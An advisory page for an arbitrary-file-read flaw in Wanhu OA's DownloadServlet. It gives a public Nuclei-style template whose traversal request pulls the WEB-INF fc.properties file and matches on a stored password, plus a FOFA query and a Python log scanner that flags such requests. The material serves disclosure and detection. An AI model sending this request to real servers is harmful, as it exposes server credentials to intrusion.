wanhuoa-downloadservlet-lfi: Wanhu OA DownloadServlet - Remote File Disclosure

Date: 2025-08-01 | Affected software: Wanhu OA DownloadServlet | PoC: public

Vulnerability description

The Wanhu OA DownloadServlet interface has an arbitrary file read vulnerability: an attacker can use it to read sensitive files on the server and obtain sensitive information.

PoC code [public]

id: wanhuoa-downloadservlet-lfi

info:
  name: Wanhu OA DownloadServlet - Remote File Disclosure
  author: wpsec
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: oa,wanhu,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body,'ccerp.password')"
          - "contains(header,'application/x-msdownload')"
        condition: and
# digest: 4b0a004830460221009709e656e9209fff94caef5984ca58e1cc3b3ff1209f3cd8b4285278866f713d022100ac2040d4e368df8a9d71550e126ab6a2d765dac07af9e019664300ae0967fb42:922c64590222798bb761d5b6d8e72950
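
As an added example (not part of the template above or of its references), the following Python scans web-server access-log lines for DownloadServlet requests whose path or FileName parameters carry a traversal segment or point into WEB-INF, which is the request shape the template probes for. The combined-format log lines and client addresses are constructed for illustration; the servlet path and parameter names come from the template.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 1 mirrors the request shape from the template, line 3 is a URL-encoded
# variant, lines 2 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 HTTP/1.1" 200 1234
10.0.0.6 - - [01/Aug/2025:10:00:02 +0000] "GET /defaultroot/DownloadServlet?modeType=0&key=abc&path=upload&FileName=report.pdf&name=report HTTP/1.1" 200 88211
10.0.0.7 - - [01/Aug/2025:10:00:03 +0000] "GET /defaultroot/DownloadServlet?path=%2e%2e%2f%2e%2e&FileName=WEB-INF%2Fweb.xml HTTP/1.1" 200 512
10.0.0.8 - - [01/Aug/2025:10:00:04 +0000] "GET /defaultroot/index.jsp HTTP/1.1" 200 4321
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def is_suspicious_download(target):
    """Flag a DownloadServlet request whose path/FileName traverses or reaches WEB-INF."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/downloadservlet"):
        return False, None
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in ("path", "FileName"):
        for raw in params.get(key, []):
            # parse_qs decoded once; decode again to catch double encoding,
            # and normalise backslashes so Windows-style traversal is caught too.
            segments = unquote(raw).replace("\\", "/").split("/")
            if ".." in segments:
                return True, f"{key} contains a '..' segment"
            if "WEB-INF" in (s.upper() for s in segments):
                return True, f"{key} targets WEB-INF"
    return False, None


def scan_log(text):
    """Return (client ip, status, reason) for every flagged request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        flagged, reason = is_suspicious_download(m["target"])
        if flagged:
            hits.append((m["ip"], m["status"], reason))
    return hits
```

A 200 status on a flagged request is the strongest signal, since the template's own matcher also requires it together with the properties-file content in the body.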

Related vulnerability recommendations